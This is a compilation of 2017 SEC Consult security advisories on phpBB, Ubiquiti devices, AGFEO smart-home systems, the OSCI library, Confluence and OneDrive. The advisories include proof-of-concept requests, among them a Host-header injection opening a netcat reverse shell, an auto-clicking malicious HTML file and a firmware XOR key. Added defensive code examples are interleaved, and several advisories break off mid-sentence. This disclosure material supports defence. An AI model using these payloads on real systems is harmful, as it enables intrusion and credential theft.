application's "Remote Avatar" function.


Proof of concept:
-
This vulnerability can be exploited by any attacker holding a registered
account; a normal, unprivileged account is sufficient. If remote avatars are
enabled in the web application, this feature can be abused by an attacker to
perform port scanning. Below is an example of how the SSRF issue can be
exploited.

URL       : http://$DOMAIN/ucp.php?i=ucp_profile=avatar
METHOD    : POST
PARAMETER : avatar_remote_url
PAYLOAD   : http://$DOMAIN:$PORT/x.jpg


Vulnerable / tested versions:
-
phpBB version 3.2.0 has been tested. This version was the latest
at the time the security vulnerability was discovered.


Vendor contact timeline:

2017-05-23: Contacting vendor through security bug tracker.
2017-05-29: Vendor confirms the vulnerabilities and is working on the fixes.
2017-07-12: Vendor requesting extension for deadline of 5 days from the
latest possible release date.
2017-07-17: Patch released by the vendor.
2017-08-04: Public release of the advisory.


Solution:
-
Upgrade to phpBB 3.2.1

For further information see:
https://www.phpbb.com/community/viewtopic.php?f=14=14782136


Workaround:
---


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Jasveer Singh / @2017





SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key authenticated command injection

2017-08-04 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170804-1 >
===
  title: Authenticated Command Injection
product: Ubiquiti Networks UniFi Cloud Key
 vulnerable version: Firmware v0.6.1
  fixed version: Firmware v0.6.4
 CVE number:
 impact: High
   homepage: https://www.ubnt.com
  found: 2017-03-26
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:

SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
A command injection can be triggered via the HTTP Host header in the status
GET request. This vulnerability can be exploited when the Cloud Key web
interface is exposed to the Internet and an attacker has credentials for it.

Proof of concept:
-
The following PHP snippet is responsible for the command execution
vulnerability:

(api.inc, line 265)
---
[...]
function is_unifi_running() {
    // HTTP_HOST is the client-supplied Host header; SERVER_ADDR is only
    // used when the header is absent.
    if (!isset($_SERVER['HTTP_HOST'])) {
        $c_host = $_SERVER['SERVER_ADDR'];
    } else {
        $c_host = $_SERVER['HTTP_HOST'];
    }
    // $c_host is concatenated unescaped into the command line passed to exec().
    $unifi_href = 'http://' . $c_host . ':8080/status';
    exec(CMD_CURL . $unifi_href, $out, $rc);
    if ($rc == 0) {
        return true;
    }
    return false;
}
[...]
---

Since '$c_host' is taken from the client-controlled Host header and is neither
filtered nor shell-escaped before being passed to exec(), a command injection
is possible.

The following GET request was used to open a reverse-shell via command injection
from the Cloud Key system (192.168.0.30) to the attacker (192.168.0.3):
---
GET /api/status HTTP/1.1
Host: 192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
X-Access-Token: 
Referer: https://192.168.0.30/login
Cookie: CKSESSIONID=
Connection: close
---

As the listener, netcat was used:
$ nc -lvp 8999

Vulnerable / tested versions:
-
Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested. This version
was the latest at the time the security vulnerabilities were discovered.


Vendor contact timeline:

2017-03-29: Contacting vendor via HackerOne. Vendor sets status to
"Triaged".
2017-04-24: Asking for a status update; No answer.
2017-05-06: Found update 0.6.4 on the website of the vendor.
2017-05-15: Contacted vendor via e-mail and asked for status.
2017-05-16: Vendor closed the ticket and changed the status to resolved.
Current firmware version was v0.6.4. Set the publication
date to 2017-08-04 (at least 90 days after fix).
2017-08-04: Public release of security advisory

Solution:
-
Upgrade to v0.6.4 or above.


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich



SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products

2017-07-25 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >
===
  title: Cross-Site Scripting (XSS)
product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP
 vulnerable version: Firmware v1.9.1
  fixed version: Firmware v1.9.1.1
 CVE number:
 impact: Medium
   homepage: https://www.ubnt.com
  found: 2017-04-04
 by: R. Freingruber, T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:

SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
This vulnerability can be exploited by deactivating or bypassing the
integrated XSS filter of Internet Explorer.

A reflected cross site scripting vulnerability was identified because of an
initialization error in "/files/index/". An attacker can exploit this
vulnerability by tricking a victim into visiting a malicious website. The
attacker is able to hijack the session of the attacked user. If the user is
currently not logged in, the injected JavaScript code can start a brute-force
attack (for example, with the default credentials ubnt:ubnt). After a session
has been established, the code has full control over the system via the CLI
feature, which is basically a shell wrapper. By abusing this vulnerability an
attacker can open ports on the router or start a reverse shell.

Proof of concept:
-
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
The following URL can be used as PoC:

https://192.168.1.1/files/index/0/aaa

SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products

2017-07-25 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170724-1 >
===
  title: Open Redirect in Login Page
product: Multiple Ubiquiti Networks products, e.g.
 TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
 AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
 AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
 BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
 locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
 NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
 NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
 Power AP N
 vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW)
  fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW)
 CVE number:
 impact: Low
   homepage: https://www.ubnt.com/
  found: 2017-03-22
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/

Business recommendation:

SEC Consult recommends not to use the devices in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Open Redirect in Login Page - HackerOne #158287
An open redirect vulnerability can be triggered by luring an attacked user
into authenticating to a Ubiquiti AirOS device by clicking on a crafted link.
This vulnerability was found earlier by another bug bounty participant
on HackerOne, where it was assigned the number #158287.

Proof of concept:
-
http:///login.cgi?uri=https://www.sec-consult.com

After a successful login, the user will be redirected to

https://www.sec-consult.com.

Vulnerable / tested versions:
-
Ubiquiti Networks AirRouter (v6.0.1)
Ubiquiti Networks TS-8-PRO (v1.3.4)

Based on information embedded in the firmware of other Ubiquiti products
gathered from our IoT Inspector tool we believe the following devices are
affected as well:
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1)
Ubiquiti Networks RM2-Ti (Version: XW v6.0.1)
Ubiquiti Networks RM5-Ti (Version: XW v6.0.1)

Vendor contact timeline:

2017-03-22: Contacting vendor via HackerOne.
2017-03-22: Vendor marked open redirect as duplicate to: #158287
The contact also states that this issue will be resolved
in the next release.
2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor
and confirmed the fix - provide at least 90 days for
customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date
to 2017-07-24.
2017-07-24: Public release of security advisory

Solution:
-
Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later.


Workaround:
---
No workaround


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

SEC Consult SA-20170712-0 :: Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products

2017-07-12 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170712-0 >
===
  title: Multiple critical vulnerabilities
product: AGFEO Smart Home ES 5xx
 AGFEO Smart Home ES 6xx
 vulnerable version: at least 1.9b, 1.10
  fixed version: 1.12c
 CVE number: -
 impact: Critical
   homepage: https://www.agfeo.de/
  found: 2016-12-28
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
AGFEO GmbH & Co. KG is a vendor of telephone systems and other
(tele-)communication products such as DECT phones, headsets and smart home
products.


Business recommendation:

The available patches should be installed immediately.

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals
as there are indications for further security issues.


Vulnerability overview/description:
---
1) Unauthenticated access to web services and authentication bypass
A web service with multiple scripts for debug purposes is accessible
on an unusual port on the device. There is also a script to read files from
the filesystem. As the web service runs with root privileges, all files
on the operating system can be read by an attacker. This only affects the
ES 5xx product line; all other vulnerabilities affect both ES 5xx and 6xx.

The configuration of the device can be changed, and arbitrary updates can be
uploaded, as well as music files for the answering machine. By reading the
database content, the usernames and their passwords can be revealed and easily
decrypted. This way the administrator password can be dumped from the database
and the device can be fully administrated by an attacker.
The normal user interface has an additional development subfolder, which was
probably used during the development process. Updates can be triggered from
this sub-platform, and log files, statistics and states can also be displayed.


2) Unauthenticated access to configuration ports
Multiple instances of TCP services are present on the device. Each of the
listening sockets is forked from a debug and configuration service. Internal
device information can be read from the device, and, among other commands,
the configuration of the device can also be altered by using these services.


3) Hardcoded cryptographic keys
Three certificates including their private keys are embedded in the firmware
of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both
product lines are exactly the same. One certificate is used for HTTPS
(default server certificate for web based configuration and management).

Impersonation, man-in-the-middle or passive decryption attacks are possible.
These attacks allow an attacker to gain access to sensitive information like
admin credentials and use them in further attacks.


4) Multiple reflected cross-site scripting (XSS) vulnerabilities
The ES 5xx SmartHome products are vulnerable to reflected cross-site scripting.
Malicious JavaScript code can be executed in the browser of a victim by luring
the victim to a handcrafted link. This is possible even if the victim is not
logged in. It is assumed that the 6xx products are affected as well, but those
could not be tested.


Proof of concept:
-
1) Unauthenticated access to web services and authentication bypass
The debug web service is available at the following URL:
http://:20011/index.html
Different scripts are accessible; the following actions can be executed:
-) Change IP configuration
-) Change time zone
-) Upload updates (any files can be uploaded to the device!)
-) Read all files on the filesystem
-) Play, delete and move voice messages on all mail boxes
-) Convert mp3 files to wav files
-) List all connected phones and the related numbers

The SQLite database is located under "/home/profile/poolstore.db". By reading
this file the usernames and passwords can be dumped. The passwords are encoded
with base64 and encrypted with XOR. To decrypt the XOR'ed password the
following key has to be used:
"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba"

The function to decrypt the password was found in the PHP script "login.php":
function decodePassword($PasswordEnc)
{
$PasswordBinaryEncBase64 = "";
$PasswordBinaryEnc="";
$PasswordBinary = array();
$Password = "
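
To make the storage weakness concrete, the following added example (not AGFEO
code) reimplements the scheme the advisory describes, base64 around a XOR with
a fixed key, beside a salted, iterated password hash. The XOR key below is a
constructed placeholder, not the device key quoted above; the function names
and the record format are assumptions for this illustration.

```python
import base64
import hashlib
import hmac
import os

# Constructed placeholder key for the demonstration (not the device key).
FIXED_XOR_KEY = bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08])


def weak_encode(password: str, key: bytes = FIXED_XOR_KEY) -> str:
    """Store a password the way the advisory describes: XOR with a repeating
    fixed key, then base64. This is encoding, not protection."""
    raw = password.encode("utf-8")
    xored = bytes(b ^ key[i % len(key)] for i, b in enumerate(raw))
    return base64.b64encode(xored).decode("ascii")


def weak_decode(encoded: str, key: bytes = FIXED_XOR_KEY) -> str:
    """XOR is its own inverse: whoever holds the key (it ships in the firmware)
    turns every stored record straight back into the password."""
    xored = base64.b64decode(encoded)
    raw = bytes(b ^ key[i % len(key)] for i, b in enumerate(xored))
    return raw.decode("utf-8")


# Hardened alternative: a per-user salt and an iterated hash. The record can be
# verified but not reversed, so a dumped database does not yield passwords.
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        PBKDF2_ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_b64, digest_b64 = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        iterations = int(iterations)
    except (ValueError, TypeError):
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    # compare_digest avoids leaking how many leading bytes matched.
    return hmac.compare_digest(actual, expected)
```

Two hashes of the same password differ because of the random salt, which is
what stops an attacker from precomputing a table for a whole product line the
way a single firmware-wide XOR key allows.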

SEC Consult SA-20170630-0 :: Multiple critical vulnerabilities in OSCI-Transport library 1.2 for German e-Government

2017-06-30 Thread SEC Consult Vulnerability Lab
We have published an accompanying blog post to this technical advisory with
further information:
German version with less technical details as an overview:
http://blog.sec-consult.com/2017/06/e-government-in-deutschland-schwachstellen.html

English version containing more detailed attack scenario descriptions:
http://blog.sec-consult.com/2017/06/german-e-government-details-vulnerabilities.html


SEC Consult Vulnerability Lab Security Advisory < 20170630-0 >
===
  title: Multiple critical vulnerabilities
product: OSCI-Transport library 1.2 for German e-Government
 vulnerable version: 1.6.1
  fixed version: 1.7.1
 CVE number: CVE-2017-10668 (Padding Oracle)
 CVE-2017-10669 (Signature Wrapping)
 CVE-2017-10670 (XXE)
 impact: Critical
   homepage: http://www.xoev.de
  found: 01/2017
 by: Wolfgang Ettlinger (Office Vienna)
 Marc Nimmerrichter (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"The specification of the OSCI-Transport protocol in version 1.2 describes a
secure, vendor-independent and interoperable data exchange format.

To ease the implementation for users in public administration as well as for
vendors of specialised administrative applications (Fachverfahren), the
OSCI 1.2 library is offered:

The library implements OSCI-Transport in version 1.2 and is therefore
independent of domain-specific content. It is part of the OSCI-Transport
infrastructure. The OSCI-Transport library is intended to be implemented in
specialised applications (on the administration side) or client systems (on
the customer side)."

URL:
http://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310


Business recommendation:

During a short security test, SEC Consult found several severe security
vulnerabilities in the OSCI 1.2 Transport library.

The OSCI 1.2 Transport library is intended to provide a secure message exchange
channel over an untrusted network (i.e. the Internet) for German government
agencies for eGovernment.

However, SEC Consult found that multiple vulnerabilities allow attackers to
decrypt encrypted messages as well as modify signed messages. Moreover, a
vulnerability can be used to read arbitrary files from any host that implements
the OSCI 1.2 transport protocol using this library.

SEC Consult recommends that KoSIT and its partners _immediately_ stop using the
OSCI 1.2 Transport library over untrusted networks. Moreover, a forensic
investigation should be conducted on all affected systems to determine
whether the vulnerabilities have been exploited in the past.

The library should only be used again after a thorough source code security
review has been conducted and all vulnerabilities have been fixed. It is
quite likely that further vulnerabilities exist as there are indications for
potential XML injection flaws.


Vulnerability overview/description:
---
1) External Entity Injection (XXE) [CVE-2017-10670]
By sending manipulated XML data to any communication partner, an attacker is
able to conduct an XXE attack on the receiving system. This attack allows an
attacker to read arbitrary files from the file system of the victim host or to
conduct a denial of service attack.
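
The defensive principle for a library that receives XML from untrusted peers is
to refuse DTDs before the parser sees them, since every entity (external or
expansion bomb) has to be declared in one. The OSCI library is Java; the guard
below is an added example in Python, not code from the library, and the
function and exception names are assumptions. It also rejects non-UTF-8 byte
streams so that a DOCTYPE cannot hide in a UTF-16 encoding that a byte-level
check would miss.

```python
import re
import xml.etree.ElementTree as ET

# Added example: inbound-message guard that refuses DTDs and undefined entities.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class UnsafeXmlError(ValueError):
    pass


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted peer; raise UnsafeXmlError on anything that
    could declare or reference an entity."""
    # A UTF-16 BOM or embedded NUL bytes mean the byte-level DOCTYPE check
    # below would not see the declaration; accept only UTF-8 documents.
    if data[:2] in (b"\xff\xfe", b"\xfe\xff") or b"\x00" in data:
        raise UnsafeXmlError("only UTF-8 documents are accepted")
    if _DOCTYPE_RE.search(data):
        raise UnsafeXmlError("DTD declarations are not accepted from remote peers")
    try:
        return ET.fromstring(data)
    except ET.ParseError as exc:
        # An entity reference with no DTD to define it surfaces as a parse error.
        raise UnsafeXmlError("malformed XML: %s" % exc) from exc


def is_safe_xml(data: bytes) -> bool:
    try:
        parse_untrusted_xml(data)
        return True
    except UnsafeXmlError:
        return False


# Constructed sample messages for the demonstration (not real OSCI traffic).
BENIGN = b'<?xml version="1.0"?><msg><to>agency</to><body>hello</body></msg>'
WITH_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE msg [<!ENTITY ext SYSTEM "file:///placeholder">]>'
    b"<msg>&ext;</msg>"
)
```

Rejecting the whole DTD is stricter than disabling external entities one
feature at a time, and it is the setting that survives a parser swap; the
error is reported before any entity could be fetched or expanded.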

2) Padding Oracle Attack [CVE-2017-10668]
The OSCI 1.2 Transport library only supports the following encryption
algorithms:
 * http://www.w3.org/2001/04/xmlenc#tripledes-cbc
 * http://www.w3.org/2001/04/xmlenc#aes128-cbc
 * http://www.w3.org/2001/04/xmlenc#aes192-cbc
 * http://www.w3.org/2001/04/xmlenc#aes256-cbc

All of these algorithms are no longer recommended by the W3C:
"Note: Use of AES GCM is strongly recommended over any CBC block encryption
algorithms as recent advances in cryptanalysis [...] have cast doubt on the
ability of CBC block encryption algorithms to protect plain text when used with
XML Encryption" (https://www.w3.org/TR/xmlenc-core1/)

Since the supported cipher algorithms do not provide protection against
modification (malleability) and the library reveals in an error message whether
decryption failed (error code 9202), SEC Consult was able to conduct a padding
oracle attack. This attack allows an attacker to bypass transport encryption.

3) Signature Wrapping attack [CVE-2017-10669]
By moving XML elements within the document tree, a signature wrapping attack can
be conducted. This allows an attacker to modify the co

SEC Consult SA-20170613-0 :: Access Restriction Bypass in Atlassian Confluence

2017-06-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170613-0 >
===
  title: Access Restriction Bypass
product: Atlassian Confluence
 vulnerable version: 4.3.0 - 6.1.1
  fixed version: 6.2.1
 CVE number: -
 impact: Medium
   homepage: https://www.atlassian.com/
  found: 2017-03-27
 by: Mathias Frank (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"In 2002, our founders, Scott Farquhar and Mike Cannon-Brookes, set
conventional wisdom on its ear by launching a successful enterprise
software company with no sales force. From Australia. Our first product, JIRA,
proved that if you make a great piece of software, price it right, and make
it available to anyone to download from the internet, teams will come. And
they'll build great things with it. And they'll tell two friends, and so on,
and so on.
Today a lot has changed. We're over 1,700 Atlassians (and growing), in six
locations, with products to help all types of teams realize their visions and
get stuff done. But the fundamentals remain the same. We're for teams because
we believe that great teams can do amazing things. We're not afraid to do
things differently. And we're driven by an inspiring set of values that shape
our culture and our products for the better."

Source: https://www.atlassian.com/company


Business recommendation:

SEC Consult recommends upgrading to the latest version available, which fixes
the identified issue.


Vulnerability overview/description:
---
1) Access Restriction Bypass
The "watch" functionality provides a user the option to subscribe to specific
content. Furthermore, the user gets a notification for any new comment made to
the previously subscribed content.

A user can manually subscribe to pages which he is not able to view and he then
receives any further comment made on the restricted page.
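
The missing piece is an object-level authorisation check on the subscription
write path, plus a second check when a notification is about to leave, because
a restriction may be added after the watch exists. The model below is an added
example, not Confluence code; the class names, the group name and the page
layout are constructed, with the page ID taken from the proof of concept.

```python
from dataclasses import dataclass, field

# Added example: "watch" subscriptions that enforce the view restriction at
# subscribe time and again at delivery time.


@dataclass(frozen=True)
class User:
    name: str
    groups: frozenset = frozenset()


@dataclass
class Page:
    page_id: int
    title: str
    # Empty means unrestricted; otherwise only these user/group names may view.
    view_restriction: set = field(default_factory=set)
    watchers: set = field(default_factory=set)

    def can_view(self, user: User) -> bool:
        if not self.view_restriction:
            return True
        return user.name in self.view_restriction or bool(user.groups & self.view_restriction)


class PermissionDenied(Exception):
    pass


class WatchService:
    def __init__(self):
        self.pages = {}
        self.sent = []  # (recipient, page_id, comment) delivery log

    def add_page(self, page: Page) -> None:
        self.pages[page.page_id] = page

    def add_watch(self, user: User, page_id: int) -> None:
        # The check the vulnerable versions lacked: authorise the write, not
        # only the display of the page.
        page = self.pages.get(page_id)
        if page is None or not page.can_view(user):
            # One answer for "missing" and "forbidden", so the endpoint cannot
            # be used to enumerate restricted page IDs.
            raise PermissionDenied("page not found or not viewable")
        page.watchers.add(user)

    def notify_comment(self, page_id: int, comment: str) -> list:
        # Defence in depth: restrictions can change after a watch was created,
        # so recipients are re-checked at delivery time.
        page = self.pages[page_id]
        recipients = [u for u in page.watchers if page.can_view(u)]
        for user in recipients:
            self.sent.append((user.name, page_id, comment))
        return sorted(u.name for u in recipients)
```

The delivery-time filter is what the workaround section below approximates
by turning notifications off entirely; re-checking per recipient keeps the
feature while closing the leak.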


Proof of concept:
-
1) Access Restriction Bypass
Prerequisite as admin user just for a proof of concept demo page:
* Create a Space "Demo Space" visible for every user and group
* Create a Page "Demo Page" (example pageID: 1048582) and restrict the
  "Viewing and editing restriction" to only the administrator group/user with
  the "/pages/getcontentpermissions.action" function.


Send the following request as user:
--
POST /users/addpagenotificationajax.action HTTP/1.1
Host: localhost:8090
Referer: http://localhost:8090/display/ds/Welcome+to+Confluence
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

pageId=1048582_token=1b5ee6615c44e4067679ccfa6e5904f0e42e8eb7
--

Then the user is subscribed to the "Demo Page" and receives a notification and
is able to receive any further comments made on the subscribed page.


Vulnerable / tested versions:
-
The following versions have been tested by SEC Consult:
Atlassian Confluence version 5.9.14 and 6.1.1

Atlassian believes that versions beginning from 4.3.0 before 6.2.1 are affected.


Vendor contact timeline:

2017-04-03: Contacting vendor through secur...@atlassian.com
2017-04-05: Vendor confirmed the vulnerability and issued the references
CONFSERVER-52241 (Confluence Server) and CONFCLOUD-54634 (Confluence
Cloud)
2017-04-13: Vendor fixed the issue CONFCLOUD-54634.
2017-05-11: Asked for planned timeline and release of a fix for
CONFSERVER-52241.
2017-05-29: Vendor released a fix for CONFSERVER-52241 with version 6.2.1.
2017-06-08: Vendor prepares a sanitised copy of CONFSERVER-52241 for release
along with the advisory -
https://jira.atlassian.com/browse/CONFSERVER-52560
2017-06-13: Public release of advisory.


Solution:
-
Upgrade to version 6.2.1 available at:
https://www.atlassian.com/software/confluence/download
The effectiveness of the fix was verified by the SEC Consult Vulnerability Lab.

https://jira.atlassian.com/browse/CONFSERVER-52560


Workaround:
---
Disable workbox notifications as per the instructions found at
https://confluence.atlassian.com/doc/configuring-workbox-notifications-301663830.html


Advisory URL:
-

SEC Consult SA-20170510-0 :: Insecure Handling Of URI Schemes in Microsoft OneDrive iOS App

2017-05-10 Thread SEC Consult Vulnerability Lab
A short demo video is available here:
https://youtu.be/0jZdM9peVSk


SEC Consult Vulnerability Lab Security Advisory < 20170510-0 >
===
  title: Insecure Handling Of URI Schemes
product: Microsoft OneDrive iOS App
 vulnerable version: 8.13
  fixed version: 8.14
 impact: Medium
   homepage: https://onedrive.live.com/
  found: 2017-04-10
 by: S. Tripathy (Office Singapore)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Do more wherever you go with Microsoft OneDrive. Get to and share your
documents, photos, and other files from your iOS device, computer (PC or
Mac), and any other devices you use. Use the Office mobile apps to stay
productive and work together, no matter where you are. The OneDrive app
for iOS lets you easily work with your personal and work files when
you're on the go."

Source:
https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8


Business recommendation:

SEC Consult recommends implementing proper validation of URI schemes and
always asking for user permission before calling an external URI scheme.


Vulnerability overview/description:
---
1) Insecure Handling of URI Schemes

Due to the lack of URI scheme validation, any external URI scheme can be
invoked by the Microsoft OneDrive iOS application without any user
interaction.


Proof of concept:
-
1) Insecure Handling of URI Schemes

An attacker can upload and share a malicious HTML file to invoke an
external URI scheme. Once the file is accessed by any OneDrive user with
an iOS device, the external URI scheme will be invoked automatically.

Example of a malicious HTML file:

<html>
<body>
<a id="callme" href="[external URI scheme, not reproduced in this advisory]">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>
=
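
The decision an app should make before handing a link from rendered content
to the operating system can be written as a small allowlist. The following is
an added example, not Microsoft code: web schemes stay in-app, a short reviewed
set of external schemes is dispatched only after a genuine user confirmation,
and everything else is dropped. The scheme sets and function names are
assumptions for this illustration.

```python
from urllib.parse import urlsplit

# Added example: scheme allowlist for links found in user-supplied HTML.
IN_APP_SCHEMES = frozenset({"http", "https"})
# External schemes that may be opened, but only after the user confirms.
CONFIRM_SCHEMES = frozenset({"mailto", "tel"})


def classify_link(href: str) -> str:
    """Return 'in_app', 'confirm' or 'block' for a link in rendered content."""
    # Drop whitespace and control characters that lenient parsers ignore
    # inside the scheme (e.g. "java\tscript:"), so we judge what the OS sees.
    cleaned = "".join(ch for ch in href.strip() if ord(ch) > 0x20 and ord(ch) != 0x7F)
    scheme = urlsplit(cleaned).scheme.lower()
    if not scheme:
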